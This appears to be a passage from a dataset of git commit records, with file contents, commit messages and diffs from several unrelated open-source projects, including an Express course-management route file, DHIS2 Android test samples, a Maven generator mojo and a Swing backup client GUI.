perModule.get(workingDir); wWriter.println(classNames.size()); for (String className : classNames) { wWriter.println(className); } } } finally { wWriter.close(); } } } catch (IOException e) { LOG.error(e); } } public void clear() { myJavaParameters = null; } }
tests mem leak
plugins/junit/src/com/intellij/execution/junit/TestObject.java
tests mem leak
<ide><path>lugins/junit/src/com/intellij/execution/junit/TestObject.java <ide> } <ide> }; <ide> <add> Disposer.register(consoleView, packetsReceiver); <ide> final DeferredActionsQueue queue = new DeferredActionsQueueImpl(); <ide> handler.getOut().setPacketDispatcher(packetsReceiver, queue); <ide> handler.getErr().setPacketDispatcher(packetsReceiver, queue);
Java
bsd-3-clause
057b0ce09fa9f4795e5067b46f64cd0721661265
0
dhis2/dhis2-android-sdk,dhis2/dhis2-android-sdk,dhis2/dhis2-android-sdk
/* * Copyright (c) 2004-2019, University of Oslo * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * Neither the name of the HISP project nor the names of its contributors may * be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package org.hisp.dhis.android.core.data.systeminfo; import org.hisp.dhis.android.core.common.BaseIdentifiableObject; import org.hisp.dhis.android.core.systeminfo.SystemInfo; import java.text.ParseException; import java.util.Date; public class SystemInfoSamples { public static SystemInfo get1() { return SystemInfo.builder() .id(1L) .serverDate(getDate("2017-11-29T11:27:46.935")) .dateFormat("yyyy-mm-dd") .version("2.30") .contextPath("https://play.dhis2.org/android-current") .systemName("DHIS 2 Demo - Sierra Leone") .build(); } public static SystemInfo get2() { return SystemInfo.builder() .id(1L) .serverDate(getDate("2018-04-29T11:27:46.935")) .dateFormat("yyyy-DD-mm") .version("2.29") .contextPath("https://play.dhis2.org/android-current") .systemName("DHIS 2 Demo - Sierra Leone") .build(); } private static Date getDate(String dateStr) { try { return BaseIdentifiableObject.DATE_FORMAT.parse(dateStr); } catch (ParseException e) { e.printStackTrace(); return null; } } }
core/src/sharedTest/java/org/hisp/dhis/android/core/data/systeminfo/SystemInfoSamples.java
/* * Copyright (c) 2004-2019, University of Oslo * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * Neither the name of the HISP project nor the names of its contributors may * be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package org.hisp.dhis.android.core.data.systeminfo; import org.hisp.dhis.android.core.common.BaseIdentifiableObject; import org.hisp.dhis.android.core.systeminfo.SystemInfo; import java.text.ParseException; import java.util.Date; public class SystemInfoSamples { public static SystemInfo get1() { return SystemInfo.builder() .id(1L) .serverDate(getDate("2017-11-29T11:27:46.935")) .dateFormat("yyyy-mm-dd") .version("2.30") .contextPath("https://play.dhis2.org/android-current") .systemName("DHIS 2 Demo - Sierra Leone") .build(); } public static SystemInfo get2() { return SystemInfo.builder() .serverDate(getDate("2018-04-29T11:27:46.935")) .dateFormat("yyyy-DD-mm") .version("2.29") .contextPath("https://play.dhis2.org/android-current") .systemName("DHIS 2 Demo - Sierra Leone") .build(); } private static Date getDate(String dateStr) { try { return BaseIdentifiableObject.DATE_FORMAT.parse(dateStr); } catch (ParseException e) { e.printStackTrace(); return null; } } }
[ANDROSDK-752] Fix SystemInfo tests
core/src/sharedTest/java/org/hisp/dhis/android/core/data/systeminfo/SystemInfoSamples.java
[ANDROSDK-752] Fix SystemInfo tests
<ide><path>ore/src/sharedTest/java/org/hisp/dhis/android/core/data/systeminfo/SystemInfoSamples.java <ide> <ide> public static SystemInfo get2() { <ide> return SystemInfo.builder() <add> .id(1L) <ide> .serverDate(getDate("2018-04-29T11:27:46.935")) <ide> .dateFormat("yyyy-DD-mm") <ide> .version("2.29")
JavaScript
mit
094348461b8d48e22cb2c66a1a015efbd13ab26f
0
CourseMapper/course-mapper,CourseMapper/course-mapper,CourseMapper/course-mapper
var express = require('express'); var config = require('config'); var appRoot = require('app-root-path'); var Course = require(appRoot + '/modules/catalogs/course.controller.js'); var Account = require(appRoot + '/modules/accounts'); var helper = require(appRoot + '/libs/core/generalLibs.js'); var debug = require('debug')('cm:route'); var moment = require('moment'); var multiparty = require('connect-multiparty'); var multipartyMiddleware = multiparty(); var router = express.Router(); var mongoose = require('mongoose'); /** * POST * create course */ router.post('/courses', function(req, res, next){ if (!req.user) { res.status(401).send('Unauthorized'); } else { var catalog = new Course(); req.body.userId = req.user._id; // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.addCourse( function (err) { res.status(200).json({result:false, errors: [err.message]}); }, // parameters req.body, function (course) { res.status(200).json({result:true, course: course}); } ); } }); /** * POST * update a course, * can take a picture file as well */ router.post('/course/:courseId', multipartyMiddleware, function(req, res, next){ if (!req.user) { return res.status(401).send('Unauthorized'); } var catalog = new Course(); req.body.userId = mongoose.Types.ObjectId(req.user._id); req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.editCourse( function (err) { helper.resReturn(err, res); }, // parameters req.body, req.files, function (course) { res.status(200).json({result:true, course: course}); } ); }); router.get('/courses', function(req, res, next) { var cat = new Course(); cat.getCourses( function(err){ helper.resReturn(err, res); }, { // parameters }, function(courses){ res.status(200).json({result: true, courses: courses}); } ); }); router.get('/course/:courseId', function(req, res, next) { if (!helper.checkRequiredParams(req.params, ['courseId'], function(err){ helper.resReturn(err, res); })) return; var cat = new Course(); cat.getCourse( function(err){ helper.resReturn(err, res); }, { _id: req.params.courseId }, function(course){ res.status(200).json({result:true, course: course}); } ); }); /** * PUT * enrolling user into a course */ router.put('/course/:courseId/enroll', function(req, res, next) { if (!req.user) return res.status(401).send('Unauthorized'); var catalog = new Course(); var uid = mongoose.Types.ObjectId(req.user._id); var courseId = mongoose.Types.ObjectId(req.params.courseId); catalog.enroll( function failed(err){ res.status(200).send({result:false, errors:err}); }, {id: uid}, {id: courseId}, function (followed) { res.status(200).json({result:true, enrollment: followed}); }, // isEnrolled -> true true); }); /** * PUT * */ router.put('/course/:courseId/leave', function(req, res, next) { if (!req.user) res.status(401).send('Unauthorized'); var uid = mongoose.Types.ObjectId(req.user._id); var courseId = mongoose.Types.ObjectId(req.params.courseId); var catalog = new Course(); catalog.leave( function failed(err){ res.status(200).send({result:false, errors:err}); }, {id: uid}, {id: courseId}, function () { res.status(200).json({result:true}); }); }); /** * PUT * add a username as a manager into a course */ router.put('/course/:courseId/addManager', function(req, res, next){ if (!req.user) { return res.status(401).send('Unauthorized'); } req.body.createdBy = mongoose.Types.ObjectId(req.user._id); req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); var catalog = new Course(); // format the tags data structure if(req.body.managers) { // because the data is in {text:the-tag} format. let's just get the values. var managerSlugs = []; var tTags = JSON.parse(req.body.managers); for (var i in tTags) { managerSlugs.push(tTags[i]['text']); } req.body.managers = managerSlugs; } catalog.addManager( function (err) { helper.resReturn(err, res); }, // parameters req.body, function (course) { res.status(200).json({result:true, course: course}); } ); }); module.exports = router;
routes/api/courses.js
var express = require('express'); var config = require('config'); var appRoot = require('app-root-path'); var Course = require(appRoot + '/modules/catalogs/course.controller.js'); var Account = require(appRoot + '/modules/accounts'); var helper = require(appRoot + '/libs/core/generalLibs.js'); var debug = require('debug')('cm:route'); var moment = require('moment'); var multiparty = require('connect-multiparty'); var multipartyMiddleware = multiparty(); var router = express.Router(); /** * POST * create course */ router.post('/courses', function(req, res, next){ if (!req.user) { res.status(401).send('Unauthorized'); } else { var catalog = new Course(); req.body.userId = req.user._id; // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.addCourse( function (err) { res.status(200).json({result:false, errors: [err.message]}); }, // parameters req.body, function (course) { res.status(200).json({result:true, course: course}); } ); } }); /** * POST * update a course, * can take a picture file as well */ router.post('/course/:courseId', multipartyMiddleware, function(req, res, next){ if (!req.user) { return res.status(401).send('Unauthorized'); } var catalog = new Course(); req.body.userId = req.user._id; req.body.courseId = req.params.courseId; // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.editCourse( function (err) { helper.resReturn(err, res); }, // parameters req.body, req.files, function (course) { res.status(200).json({result:true, course: course}); } ); }); router.get('/courses', function(req, res, next) { var cat = new Course(); cat.getCourses( function(err){ helper.resReturn(err, res); }, { // parameters }, function(courses){ res.status(200).json({result: true, courses: courses}); } ); }); router.get('/course/:courseId', function(req, res, next) { if (!helper.checkRequiredParams(req.params, ['courseId'], function(err){ helper.resReturn(err, res); })) return; var cat = new Course(); cat.getCourse( function(err){ helper.resReturn(err, res); }, { _id: req.params.courseId }, function(course){ res.status(200).json({result:true, course: course}); } ); }); /** * PUT * enrolling user into a course */ router.put('/course/:courseId/enroll', function(req, res, next) { if (!req.user) return res.status(401).send('Unauthorized'); var catalog = new Course(); catalog.enroll( function failed(err){ res.status(200).send({result:false, errors:err}); }, {id: req.user._id}, {id: req.params.courseId}, function (followed) { res.status(200).json({result:true, enrollment: followed}); }, // isEnrolled -> true true); }); /** * PUT * */ router.put('/course/:courseId/leave', function(req, res, next) { if(!req.params.courseId) res.status(500).send('parameter not complete'); if (!req.user) res.status(401).send('Unauthorized'); var catalog = new Course(); catalog.leave( function failed(err){ res.status(200).send({result:false, errors:err}); }, {id: req.user._id}, {id: req.params.courseId}, function () { res.status(200).json({result:true}); }); }); module.exports = router;
add addManager route
routes/api/courses.js
add addManager route
<ide><path>outes/api/courses.js <ide> var multiparty = require('connect-multiparty'); <ide> var multipartyMiddleware = multiparty(); <ide> var router = express.Router(); <add>var mongoose = require('mongoose'); <ide> <ide> /** <ide> * POST <ide> } <ide> <ide> var catalog = new Course(); <del> req.body.userId = req.user._id; <del> req.body.courseId = req.params.courseId; <add> req.body.userId = mongoose.Types.ObjectId(req.user._id); <add> req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); <ide> <ide> // format the tags data structure <ide> if(req.body.tags) { <ide> return res.status(401).send('Unauthorized'); <ide> <ide> var catalog = new Course(); <add> <add> var uid = mongoose.Types.ObjectId(req.user._id); <add> var courseId = mongoose.Types.ObjectId(req.params.courseId); <add> <ide> catalog.enroll( <ide> function failed(err){ <ide> res.status(200).send({result:false, errors:err}); <ide> }, <del> {id: req.user._id}, <del> {id: req.params.courseId}, <add> <add> {id: uid}, <add> {id: courseId}, <add> <ide> function (followed) { <ide> res.status(200).json({result:true, enrollment: followed}); <ide> }, <ide> * <ide> */ <ide> router.put('/course/:courseId/leave', function(req, res, next) { <del> if(!req.params.courseId) <del> res.status(500).send('parameter not complete'); <del> <ide> if (!req.user) <ide> res.status(401).send('Unauthorized'); <add> <add> var uid = mongoose.Types.ObjectId(req.user._id); <add> var courseId = mongoose.Types.ObjectId(req.params.courseId); <ide> <ide> var catalog = new Course(); <ide> catalog.leave( <ide> function failed(err){ <ide> res.status(200).send({result:false, errors:err}); <ide> }, <del> {id: req.user._id}, <del> {id: req.params.courseId}, <add> <add> {id: uid}, <add> {id: courseId}, <add> <ide> function () { <ide> res.status(200).json({result:true}); <ide> }); <ide> }); <add> <add>/** <add> * PUT <add> * add a username as a manager into a course <add> */ <add>router.put('/course/:courseId/addManager', function(req, res, next){ <add> if (!req.user) { <add> return res.status(401).send('Unauthorized'); <add> } <add> <add> req.body.createdBy = mongoose.Types.ObjectId(req.user._id); <add> req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); <add> <add> var catalog = new Course(); <add> <add> // format the tags data structure <add> if(req.body.managers) { <add> // because the data is in {text:the-tag} format. let's just get the values. <add> var managerSlugs = []; <add> var tTags = JSON.parse(req.body.managers); <add> for (var i in tTags) { <add> managerSlugs.push(tTags[i]['text']); <add> } <add> req.body.managers = managerSlugs; <add> } <add> <add> catalog.addManager( <add> function (err) { <add> helper.resReturn(err, res); <add> }, <add> <add> // parameters <add> req.body, <add> <add> function (course) { <add> res.status(200).json({result:true, course: course}); <add> } <add> ); <add>}); <add> <ide> module.exports = router;
Java
mit
error: pathspec 'src/main/java/org/psjava/ds/geometry/PointByYXComparator.java' did not match any file(s) known to git
fcb6616cf18d56ba3bbbebba82734c099a94af8e
1
psjava/psjava,psjava/psjava
package org.psjava.ds.geometry; import org.psjava.util.SeriesComparator; import java.util.Comparator; public class PointByYXComparator { @SuppressWarnings("unchecked") public static <T> Comparator<Point2D<T>> create(Comparator<T> comp) { return SeriesComparator.create(PointByYComparator.create(comp), PointByXComparator.create(comp)); } private PointByYXComparator() { } }
src/main/java/org/psjava/ds/geometry/PointByYXComparator.java
add PointByYXComparator
src/main/java/org/psjava/ds/geometry/PointByYXComparator.java
add PointByYXComparator
<ide><path>rc/main/java/org/psjava/ds/geometry/PointByYXComparator.java <add>package org.psjava.ds.geometry; <add> <add>import org.psjava.util.SeriesComparator; <add> <add>import java.util.Comparator; <add> <add>public class PointByYXComparator { <add> <add> @SuppressWarnings("unchecked") <add> public static <T> Comparator<Point2D<T>> create(Comparator<T> comp) { <add> return SeriesComparator.create(PointByYComparator.create(comp), PointByXComparator.create(comp)); <add> } <add> <add> private PointByYXComparator() { <add> } <add> <add>}
Java
apache-2.0
f125a6ae6068a3f567226d2998e3f980b2d90432
0
soi-toolkit/soi-toolkit-mule
/* * Licensed to the soi-toolkit project under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The soi-toolkit project licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.soitoolkit.tools.generator.maven; import java.io.File; import java.net.URL; import java.util.ArrayList; import java.util.List; import org.apache.maven.plugin.AbstractMojo; import org.apache.maven.plugin.MojoExecutionException; import org.soitoolkit.tools.generator.Generator; import org.soitoolkit.tools.generator.IntegrationComponentGenerator; import org.soitoolkit.tools.generator.model.ModelFactory; import org.soitoolkit.tools.generator.model.enums.DeploymentModelEnum; import org.soitoolkit.tools.generator.model.enums.MuleVersionEnum; import org.soitoolkit.tools.generator.model.enums.TransportEnum; /** * Goal for creating an new Integration Component * * @goal genIC * @requiresProject false * * @author Magnus Larsson */ public class GenIntegrationComponentMojo extends AbstractMojo { /** * ArtifactId. * @parameter expression="${artifactId}" default-value="sample1" * @required */ private String artifactId; /** * GroupId. * @parameter expression="${groupId}" default-value="org.sample" * @required */ private String groupId; /** * Version. * @parameter expression="${version}" default-value="1.0.0-SNAPSHOT" * @required */ private String version; /** * Mule version. * @parameter expression="${muleVersion}" default-value="3.1.1" * @required */ private String muleVersion; /** * Deploy model. * @parameter expression="${deployModel}" default-value="Standalone" * @required */ private String deployModel; /** * Connectors. * @parameter expression="${connectors}" default-value="JDBC,FTP,SFTP" // Servlet * @required */ private String connectors; /** * Groovy Model. * @parameter expression="${groovyModel}" * @optional */ private URL groovyModel; /** * Location of the output folder. * @parameter expression="${outDir}" default-value="." * @required */ private File outDir; private static String[] allowedConnectors = new String[] {"JDBC","FTP","SFTP","Servlet"}; public void execute() throws MojoExecutionException { getLog().info(""); getLog().info("========================================="); getLog().info("= Creating an new Integration Component ="); getLog().info("========================================="); getLog().info(""); getLog().info("ARGUMENTS:"); getLog().info("(change an arg by suppling: -Darg=value):"); getLog().info(""); getLog().info("outDir=" + outDir.getPath()); // getLog().info("outDir=" + outDir.getAbsolutePath()); // try { // getLog().info("outDir=" + outDir.getCanonicalPath()); // } catch (IOException e) { // // TODO Auto-generated catch block // e.printStackTrace(); // } getLog().info("artifactId=" + artifactId); getLog().info("groupId=" + groupId); getLog().info("version=" + version); getLog().info("muleVersion=" + muleVersion); getLog().info("deployModel=" + deployModel); getLog().info("connectors=JMS," + connectors); getLog().info("groovyModel=" + groovyModel); getLog().info(""); initGroovyModel(); MuleVersionEnum muleVersionEnum = initMuleVersion(muleVersion); DeploymentModelEnum deployModelEnum = initDeployModel(deployModel); List<TransportEnum> connectorsEnum = initConnectors(connectors); Generator g = new IntegrationComponentGenerator(System.out, groupId, artifactId, version, muleVersionEnum, deployModelEnum, connectorsEnum, outDir.getPath()); g.startGenerator(); } private void initGroovyModel() throws MojoExecutionException { if (groovyModel != null) { try { ModelFactory.setModelGroovyClass(groovyModel); } catch (Exception e) { throw new MojoExecutionException("Invalid Groovy model: " + groovyModel, e); } } } private MuleVersionEnum initMuleVersion(String muleVersion) throws MojoExecutionException { MuleVersionEnum muleVersionEnum = null; try { muleVersionEnum = MuleVersionEnum.getByLabel(muleVersion); } catch (Exception e) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues(), e); } if (muleVersionEnum == null) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues()); } return muleVersionEnum; } private DeploymentModelEnum initDeployModel(String deployModel) throws MojoExecutionException { DeploymentModelEnum deployModelEnum = null; try { deployModelEnum = DeploymentModelEnum.getByLabel(deployModel); } catch (Exception e) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues(), e); } if (deployModelEnum == null) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues()); } return deployModelEnum; } private List<TransportEnum> initConnectors(String connectors) throws MojoExecutionException { List<TransportEnum> ts = new ArrayList<TransportEnum>(); ts.add(TransportEnum.JMS); // Bail out if no extra connectors specified if (connectors.trim().length() == 0) return ts; String[] connectorArr = connectors.split(","); for (int i = 0; i < connectorArr.length; i++) { connectorArr[i] = connectorArr[i].trim(); } for (String connector : connectorArr) { TransportEnum t = getTransport(connector); ts.add(t); } return ts; } private TransportEnum getTransport(String connector) throws MojoExecutionException { TransportEnum transportEnum = null; for (String allowedConnector : allowedConnectors) { if (allowedConnector.equals(connector)) { transportEnum = TransportEnum.valueOf(connector); } } if (transportEnum == null) { throw new MojoExecutionException("Invalid connector: " + connector + ", allowed values: " + getAllowedConnectors()); } return transportEnum; } private String getAllowedConnectors() { String allowedConnectorsStr = ""; for (String allowedConnector : allowedConnectors) { allowedConnectorsStr += allowedConnector + " "; } return allowedConnectorsStr; } }
tools/soitoolkit-generator/soitoolkit-generator-maven-plugin/src/main/java/org/soitoolkit/tools/generator/maven/GenIntegrationComponentMojo.java
/* * Licensed to the soi-toolkit project under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The soi-toolkit project licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.soitoolkit.tools.generator.maven; import java.io.File; import java.net.URL; import java.util.ArrayList; import java.util.List; import org.apache.maven.plugin.AbstractMojo; import org.apache.maven.plugin.MojoExecutionException; import org.soitoolkit.tools.generator.Generator; import org.soitoolkit.tools.generator.IntegrationComponentGenerator; import org.soitoolkit.tools.generator.model.ModelFactory; import org.soitoolkit.tools.generator.model.enums.DeploymentModelEnum; import org.soitoolkit.tools.generator.model.enums.MuleVersionEnum; import org.soitoolkit.tools.generator.model.enums.TransportEnum; /** * Goal for creating an new Integration Component * * @goal genIC * @requiresProject false * * @author Magnus Larsson */ public class GenIntegrationComponentMojo extends AbstractMojo { /** * ArtifactId. * @parameter expression="${artifactId}" default-value="sample1" * @required */ private String artifactId; /** * GroupId. * @parameter expression="${groupId}" default-value="org.sample" * @required */ private String groupId; /** * Version. * @parameter expression="${version}" default-value="1.0.0-SNAPSHOT" * @required */ private String version; /** * Mule version. * @parameter expression="${muleVersion}" default-value="3.1.1" * @required */ private String muleVersion; /** * Deploy model. * @parameter expression="${deployModel}" default-value="Standalone" * @required */ private String deployModel; /** * Connectors. * @parameter expression="${connectors}" default-value="JDBC,FTP,SFTP" // Servlet * @required */ private String connectors; /** * Groovy Model. * @parameter expression="${groovyModel}" * @optional */ private URL groovyModel; /** * Location of the output folder. * @parameter expression="${outDir}" default-value="." * @required */ private File outDir; private static String[] allowedConnectors = new String[] {"JDBC","FTP","SFTP","Servlet"}; public void execute() throws MojoExecutionException { getLog().info(""); getLog().info("========================================="); getLog().info("= Creating an new Integration Component ="); getLog().info("========================================="); getLog().info(""); getLog().info("ARGUMENTS:"); getLog().info(""); getLog().info("outDir=" + outDir.getPath()); // getLog().info("outDir=" + outDir.getAbsolutePath()); // try { // getLog().info("outDir=" + outDir.getCanonicalPath()); // } catch (IOException e) { // // TODO Auto-generated catch block // e.printStackTrace(); // } getLog().info("artifactId=" + artifactId); getLog().info("groupId=" + groupId); getLog().info("version=" + version); getLog().info("muleVersion=" + muleVersion); getLog().info("deployModel=" + deployModel); getLog().info("connectors=JMS," + connectors); getLog().info("groovyModel=" + groovyModel); getLog().info(""); initGroovyModel(); MuleVersionEnum muleVersionEnum = initMuleVersion(muleVersion); DeploymentModelEnum deployModelEnum = initDeployModel(deployModel); List<TransportEnum> connectorsEnum = initConnectors(connectors); Generator g = new IntegrationComponentGenerator(System.out, groupId, artifactId, version, muleVersionEnum, deployModelEnum, connectorsEnum, outDir.getPath()); g.startGenerator(); } private void initGroovyModel() throws MojoExecutionException { if (groovyModel != null) { try { ModelFactory.setModelGroovyClass(groovyModel); } catch (Exception e) { throw new MojoExecutionException("Invalid Groovy model: " + groovyModel, e); } } } private MuleVersionEnum initMuleVersion(String muleVersion) throws MojoExecutionException { MuleVersionEnum muleVersionEnum = null; try { muleVersionEnum = MuleVersionEnum.getByLabel(muleVersion); } catch (Exception e) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues(), e); } if (muleVersionEnum == null) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues()); } return muleVersionEnum; } private DeploymentModelEnum initDeployModel(String deployModel) throws MojoExecutionException { DeploymentModelEnum deployModelEnum = null; try { deployModelEnum = DeploymentModelEnum.getByLabel(deployModel); } catch (Exception e) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues(), e); } if (deployModelEnum == null) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues()); } return deployModelEnum; } private List<TransportEnum> initConnectors(String connectors) throws MojoExecutionException { List<TransportEnum> ts = new ArrayList<TransportEnum>(); ts.add(TransportEnum.JMS); // Bail out if no extra connectors specified if (connectors.trim().length() == 0) return ts; String[] connectorArr = connectors.split(","); for (int i = 0; i < connectorArr.length; i++) { connectorArr[i] = connectorArr[i].trim(); } for (String connector : connectorArr) { TransportEnum t = getTransport(connector); ts.add(t); } return ts; } private TransportEnum getTransport(String connector) throws MojoExecutionException { TransportEnum transportEnum = null; for (String allowedConnector : allowedConnectors) { if (allowedConnector.equals(connector)) { transportEnum = TransportEnum.valueOf(connector); } } if (transportEnum == null) { throw new MojoExecutionException("Invalid connector: " + connector + ", allowed values: " + getAllowedConnectors()); } return transportEnum; } private String getAllowedConnectors() { String allowedConnectorsStr = ""; for (String allowedConnector : allowedConnectors) { allowedConnectorsStr += allowedConnector + " "; } return allowedConnectorsStr; } }
Update issue 109 Added online info on how to change args
tools/soitoolkit-generator/soitoolkit-generator-maven-plugin/src/main/java/org/soitoolkit/tools/generator/maven/GenIntegrationComponentMojo.java
Update issue 109
<ide><path>ools/soitoolkit-generator/soitoolkit-generator-maven-plugin/src/main/java/org/soitoolkit/tools/generator/maven/GenIntegrationComponentMojo.java <ide> getLog().info("========================================="); <ide> getLog().info(""); <ide> getLog().info("ARGUMENTS:"); <add> getLog().info("(change an arg by suppling: -Darg=value):"); <ide> getLog().info(""); <ide> getLog().info("outDir=" + outDir.getPath()); <ide> // getLog().info("outDir=" + outDir.getAbsolutePath());
Java
mit
482ccaef02672312d165e9c796e9918796a2ec3a
0
k-danna/backupbuddies,k-danna/backupbuddies
package backupbuddies.gui; import java.awt.*; import java.awt.event.*; import javax.swing.*; import javax.swing.event.DocumentEvent; import javax.swing.event.DocumentListener; import javax.swing.event.ChangeListener; import javax.swing.event.ChangeEvent; import java.util.List; import java.util.ArrayList; import java.util.Map; import java.util.Set; import java.util.HashMap; import java.lang.*; //do not import util.* //there is a Timer class in util and swing that conflict //currently using swing timer import backupbuddies.shared.Interface; import backupbuddies.gui.ListModel; import static backupbuddies.Debug.*; @SuppressWarnings("serial") public class GuiMain extends JFrame { //load assets, lists etc before creating the gui static JFrame frame; static JTextField saveDir = new JTextField(); static final DefaultListModel<String> userModel = new DefaultListModel<String>(); static final DefaultListModel<String> fileModel = new DefaultListModel<String>(); static DefaultListModel<String> files = new DefaultListModel<String>(); static DefaultListModel<ListModel> test = new DefaultListModel<ListModel>(); static JList<ListModel> hi = new JList<ListModel>(); static DefaultListModel<ListModel> debug = new DefaultListModel<ListModel>(); static final JTextArea log = new JTextArea(5, 20); static List<String> prevEvents = new ArrayList<>(); static ImageIcon statusRed = new ImageIcon("bin/backupbuddies/gui/assets/RedCircle.png"); static ImageIcon statusYellow = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/YellowCircle.png"); static ImageIcon statusGreen = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/GreenCircle.png"); static JList<ListModel> userMap = fetchAndProcess("users"); static JList<ListModel> fileMap = fetchAndProcess("files"); //process lists returned from networking //NOTE: to speed this up we can just do it in the interface methods //iteration already occurs there public static JList<ListModel> fetchAndProcess(String type) { //get data JList<ListModel> map = new JList<ListModel>(); //debug = new DefaultListModel<>(); if (type.equals("users")) debug = Interface.fetchUserList(); else if (type.equals("files")) debug = Interface.fetchFileList(); return map; } //updates ui on interval public static void startIntervals(int interval) { ActionListener updateUI = new ActionListener() { public void actionPerformed(ActionEvent e) { userMap = fetchAndProcess("users"); fileMap = fetchAndProcess("files"); //FIXME: this gets slower as more events are added //prevArray --> int (length of last returned array) //change to check length of returned array //append the last (len(events) - prevLength) elements to log //if this is negative they cleared the event log //only reset prevArraysize variable List<String> events = Interface.getEventLog(); for (String event : events) { if (!prevEvents.contains(event)) { log.append(event + "\n"); log.setCaretPosition(log.getDocument().getLength()); } } prevEvents = events; } }; Timer timer = new Timer(interval, updateUI); timer.setRepeats(true); timer.start(); } //user chooses directory to save to public static void setSaveDir() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose 